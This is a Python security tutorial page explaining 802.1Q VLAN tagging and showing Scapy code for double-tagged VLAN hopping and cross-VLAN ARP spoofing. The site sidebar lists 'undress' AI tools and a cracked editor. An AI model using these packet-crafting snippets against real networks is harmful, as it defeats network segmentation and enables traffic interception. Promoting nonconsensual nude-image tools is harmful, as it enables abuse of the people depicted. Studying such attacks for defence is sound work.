search
HomeBackend DevelopmentPython TutorialPython black hat programming 3.4 across VLAN

VLAN (Virtual Local Area Network) is a virtual network built based on Ethernet interaction technology. It can not only divide the same physical network into multiple VALNs, but also cross physical network barriers and divide users in different subnets into in the same VLAN. Figure 2 is an example of VLAN division.

Python黑帽编程 3.4 跨越VLAN

Figure 2

There are many ways to implement VLAN. There are generally two types of VLAN division based on switching equipment:

l Switch-based port division

l Based on IEEE 802.1q protocol, extended Ethernet frame format

Layer 2-based VLAN Technology, there is the concept of Trunking, which is used to connect different switches to ensure that members of the same VLAN established across multiple switches can communicate with each other. The ports used for interconnection between switches are called Trunk ports. In addition to 80.2.1q, Cisco has its own Trunk protocol called ISL.

Python黑帽编程 3.4 跨越VLAN

Figure 3

Figure 3 is an 802.1q data packet, which is not essentially different from an ordinary Ethernet frame. Just add a VLAN Tag. The VLAN Identifier in the red part identifies which VLAN a data packet belongs to, thus ensuring that the range of data broadcast does not span VLANs.

Now let’s think about it briefly. If we want to communicate across VLANs, can we just modify the identifier in the data packet?

3.4.1 VLAN Hopping

Based on the above analysis, we consider a simple scenario: cross-VLAN ping, Send a ping request from a host in Vlan1 to a host in Vlan2.

Before specific coding, we still need to solve the problem of VLAN packet construction. In Scapy, we use the Dot1Q class to construct the Tag part in Figure 3. As shown in Figure 4.

Python黑帽编程 3.4 跨越VLAN

Figure 4

Now we can write a cross-VLAN ping request.

#!/usr/bin/python 
from scapy.all import * 
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
Dot1Q(vlan=1) / \
Dot1Q(vlan=2) / \
IP(dst="192.168.13.3") / \
ICMP() 
sendp(packet)

In the above code we specify the MAC and IP address of the target host, and add two VLAN identifiers, the first one is for sending data The VLAN where the host is located, and the second one is the VLAN where the target host is located. The switch will remove the first identifier, and when it reads the second identifier, it will forward the packet to the target host.

3.4.2 Cross-VLAN ARP spoofing

3.1, 3.2 and 3.3 We are all discussing the issue of ARP spoofing. Since VLAN limits the broadcast domain, our previous code cannot perform ARP spoofing across VLANs. However, it is very simple to solve this problem. We only need to insert the VLAN identifier into the ARP spoofing data we constructed previously. The following code is the code we used to construct the ARP request packet in Section 3.1.

def build_req():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt

In the part of constructing the data packet, we insert the VLAN identifier:

pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

In this way, cross-VLAN ARP spoofing can be achieved.

3.4.3 Summary

This section mainly talks about how to construct data packets that spoof VLAN to achieve cross-VLAN Data communication and ARP spoofing purposes. It should be noted that the method in this article mainly targets the 802.1Q protocol and has no effect on VLANs that are physically isolated by ports.

The above is the detailed explanation of Python black hat programming 3.4 across VLANs introduced by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply in time. Ours. I would also like to thank you all for your support of the PHP Chinese website!

For more Python black hat programming 3.4 cross-VLAN related articles, please pay attention to the PHP Chinese website!


Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Is Tuple Comprehension possible in Python? If yes, how and if not why?Is Tuple Comprehension possible in Python? If yes, how and if not why?Apr 28, 2025 pm 04:34 PM

Article discusses impossibility of tuple comprehension in Python due to syntax ambiguity. Alternatives like using tuple() with generator expressions are suggested for creating tuples efficiently.(159 characters)

What are Modules and Packages in Python?What are Modules and Packages in Python?Apr 28, 2025 pm 04:33 PM

The article explains modules and packages in Python, their differences, and usage. Modules are single files, while packages are directories with an __init__.py file, organizing related modules hierarchically.

What is docstring in Python?What is docstring in Python?Apr 28, 2025 pm 04:30 PM

Article discusses docstrings in Python, their usage, and benefits. Main issue: importance of docstrings for code documentation and accessibility.

What is a lambda function?What is a lambda function?Apr 28, 2025 pm 04:28 PM

Article discusses lambda functions, their differences from regular functions, and their utility in programming scenarios. Not all languages support them.

What is a break, continue and pass in Python?What is a break, continue and pass in Python?Apr 28, 2025 pm 04:26 PM

Article discusses break, continue, and pass in Python, explaining their roles in controlling loop execution and program flow.

What is a pass in Python?What is a pass in Python?Apr 28, 2025 pm 04:25 PM

The article discusses the 'pass' statement in Python, a null operation used as a placeholder in code structures like functions and classes, allowing for future implementation without syntax errors.

Can we Pass a function as an argument in Python?Can we Pass a function as an argument in Python?Apr 28, 2025 pm 04:23 PM

Article discusses passing functions as arguments in Python, highlighting benefits like modularity and use cases such as sorting and decorators.

What is the difference between / and // in Python?What is the difference between / and // in Python?Apr 28, 2025 pm 04:21 PM

Article discusses / and // operators in Python: / for true division, // for floor division. Main issue is understanding their differences and use cases.Character count: 158

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

MantisBT

MantisBT

Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

EditPlus Chinese cracked version

EditPlus Chinese cracked version

Small size, syntax highlighting, does not support code prompt function

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

Powerful PHP integrated development environment

SecLists

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.